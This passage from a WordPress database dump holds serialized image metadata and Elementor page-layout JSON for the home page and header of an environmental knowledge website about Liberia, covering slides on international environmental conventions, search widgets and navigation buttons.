/11/home_4.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"home_4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"home_4-300x166.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"home_4-768x424.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:424;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"home_4-1024x565.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:565;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"9\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"ILCE-3000\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1473269293\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"20\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:6:\"0.0125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(2216,297,'_wp_attached_file','2017/08/cropped-favicon.png'),(2217,297,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:27:\"2017/08/cropped-favicon.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"cropped-favicon-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"cropped-favicon-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2218,297,'_wp_attachment_context','site-icon'),(2219,297,'_imagify_optimization_level','2'),(2220,297,'_imagify_data','a:2:{s:5:\"sizes\";a:7:{s:4:\"full\";a:5:{s:7:\"success\";b:1;s:8:\"file_url\";s:74:\"https://medical.oceanwp.org/wp-content/uploads/2017/08/cropped-favicon.png\";s:13:\"original_size\";i:9765;s:14:\"optimized_size\";i:4035;s:7:\"percent\";d:58.67999999999999971578290569595992565155029296875;}s:9:\"thumbnail\";a:5:{s:7:\"success\";b:1;s:8:\"file_url\";s:82:\"https://medical.oceanwp.org/wp-content/uploads/2017/08/cropped-favicon-150x150.png\";s:13:\"original_size\";i:6074;s:14:\"optimized_size\";i:1199;s:7:\"percent\";d:80.2600000000000051159076974727213382720947265625;}s:6:\"medium\";a:5:{s:7:\"success\";b:1;s:8:\"file_url\";s:82:\"https://medical.oceanwp.org/wp-content/uploads/2017/08/cropped-favicon-300x300.png\";s:13:\"original_size\";i:18108;s:14:\"optimized_size\";i:2690;s:7:\"percent\";d:85.1400000000000005684341886080801486968994140625;}s:13:\"site_icon-270\";a:5:{s:7:\"success\";b:1;s:8:\"file_url\";s:82:\"https://medical.oceanwp.org/wp-content/uploads/2017/08/cropped-favicon-270x270.png\";s:13:\"original_size\";i:15057;s:14:\"optimized_size\";i:2181;s:7:\"percent\";d:85.5199999999999960209606797434389591217041015625;}s:13:\"site_icon-192\";a:5:{s:7:\"success\";b:1;s:8:\"file_url\";s:82:\"https://medical.oceanwp.org/wp-content/uploads/2017/08/cropped-favicon-192x192.png\";s:13:\"original_size\";i:6030;s:14:\"optimized_size\";i:1546;s:7:\"percent\";d:74.3599999999999994315658113919198513031005859375;}s:13:\"site_icon-180\";a:5:{s:7:\"success\";b:1;s:8:\"file_url\";s:82:\"https://medical.oceanwp.org/wp-content/uploads/2017/08/cropped-favicon-180x180.png\";s:13:\"original_size\";i:7984;s:14:\"optimized_size\";i:1412;s:7:\"percent\";d:82.31000000000000227373675443232059478759765625;}s:12:\"site_icon-32\";a:5:{s:7:\"success\";b:1;s:8:\"file_url\";s:80:\"https://medical.oceanwp.org/wp-content/uploads/2017/08/cropped-favicon-32x32.png\";s:13:\"original_size\";i:669;s:14:\"optimized_size\";i:331;s:7:\"percent\";d:50.52000000000000312638803734444081783294677734375;}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:63687;s:14:\"optimized_size\";i:13394;s:7:\"percent\";d:78.969999999999998863131622783839702606201171875;}}'),(2221,297,'_imagify_status','success'),(2313,9,'rank_math_internal_links_processed','1'),(2314,9,'_wp_page_template','default'),(2315,9,'ocean_post_layout','full-screen'),(2316,9,'ocean_sidebar','0'),(2317,9,'ocean_disable_margins','on'),(2318,9,'ocean_display_top_bar','default'),(2319,9,'ocean_display_header','default'),(2320,9,'ocean_header_custom_menu','0'),(2321,9,'ocean_disable_title','on'),(2322,9,'ocean_post_title_height','400'),(2323,9,'ocean_post_title_bg_overlay','0.5'),(2324,9,'ocean_disable_breadcrumbs','default'),(2325,9,'ocean_display_footer_widgets','default'),(2326,9,'ocean_display_footer_bottom','default'),(2327,9,'_elementor_edit_mode','builder'),(2328,9,'_elementor_data','[{\"id\":\"c41f68d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0aa7a91\"}],\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"0b8df2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2ff14bc\",\"elType\":\"widget\",\"settings\":{\"slides\":[{\"heading\":\"Convention on Biological Diversity \",\"description\":\"CBD is dedicated to promoting sustainable development\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"ef41cbd\",\"horizontal_position\":\"center\",\"vertical_position\":\"middle\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"link_click\":\"button\"},{\"heading\":\"Convention on Climate Change\",\"description\":\"The ultimate objective of the Convention is to stabilize greenhouse gas concentrations \\\"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\\\"\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"11d0065\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_marine.jpg\",\"id\":2158,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"link_click\":\"button\"},{\"heading\":\"Convention to Combat Desertification\",\"description\":\"A sole legally binding international agreement linking environment and development to sustainable land management.\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"3d86158\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/slide_ccd.jpg\",\"id\":14,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"link_click\":\"button\"}],\"slides_height\":{\"unit\":\"px\",\"size\":370,\"sizes\":[]},\"content_animation\":\"fadeInLeft\"},\"elements\":[],\"widgetType\":\"slides\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3832980\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":120,\"sizes\":[]},\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8ce7e10\"}],\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"f8bb5a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db42395\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a3ddb70\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"ecc2093\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":12.2370000000000000994759830064140260219573974609375},\"elements\":[],\"isInner\":true},{\"id\":\"73e3c60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":77.0799999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":true},{\"id\":\"e733e70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":10.3469999999999995310417943983338773250579833984375},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\"}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}],\"reverse_order_tablet\":\"reverse-tablet\",\"reverse_order_mobile\":\"reverse-mobile\",\"hide_mobile\":\"hidden-phone\"},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/document-library\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\"}],\"background_background\":\"classic\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest News & Blogs\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"339607e\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"684051a\",\"elType\":\"widget\",\"settings\":{\"number\":4,\"columns\":\"4\",\"equal_height_cols\":\"true\",\"title_trimmed\":\"yes\",\"title_length\":10,\"title_trimmed_ending_text\":\"...\",\"excerpt_length\":10,\"show_terms\":\"yes\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"537281f\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"821cf97\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_bg\":\"rgba(0,100,0,0.59)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"excerpt_color\":\"rgba(255,255,255,0.75)\",\"excerpt_typography_typography\":\"custom\",\"excerpt_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"terms_link_bg_color\":\"#6ec1e4\",\"show_author\":\"\",\"show_comments\":\"\",\"arrows\":\"\",\"autoplay\":\"\",\"infinite\":\"\",\"meta_title_related_position\":\"after\",\"meta_content_related_position\":\"after\",\"title_color_hover\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-posts\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read All News & Blogs\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/news-and-blogs\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(2329,9,'_elementor_version','3.7.8'),(2380,30,'rank_math_internal_links_processed','1'),(2381,30,'_wp_page_template','elementor_canvas'),(2382,30,'ocean_sidebar','0'),(2383,30,'ocean_disable_margins','enable'),(2384,30,'ocean_display_top_bar','default'),(2385,30,'ocean_display_header','default'),(2386,30,'ocean_header_custom_menu','0'),(2387,30,'ocean_disable_title','default'),(2388,30,'ocean_post_title_height','400'),(2389,30,'ocean_post_title_bg_overlay','0.5'),(2390,30,'ocean_disable_breadcrumbs','default'),(2391,30,'ocean_display_footer_widgets','default'),(2392,30,'ocean_display_footer_bottom','default'),(2393,30,'_elementor_edit_mode','builder'),(2394,30,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":10.7750000000000003552713678800500929355621337890625,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":72.173000000000001818989403545856475830078125,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge<br> Management System\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_font_family\":\"Roboto Slab\",\"text_shadow_text_shadow\":{\"horizontal\":16,\"vertical\":0,\"blur\":10,\"color\":\"rgba(0,0,0,0.3)\"},\"typography_line_height\":{\"unit\":\"em\",\"size\":1,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4fca764\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":18.150999999999999801048033987171947956085205078125},\"elements\":[{\"id\":\"9491976\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Join Us to help grow <br>the EKMS Community\",\"align\":\"center\",\"text_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9096130\",\"elType\":\"widget\",\"settings\":{\"text\":\"Sign up, It\'s Free!\",\"link\":{\"url\":\"https:\\/\\/ekms-liberia.mn.co\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#006400\",\"background_color\":\"rgba(0,0,0,0)\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#006400\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_color\":\"rgba(1,68,33,0.64)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\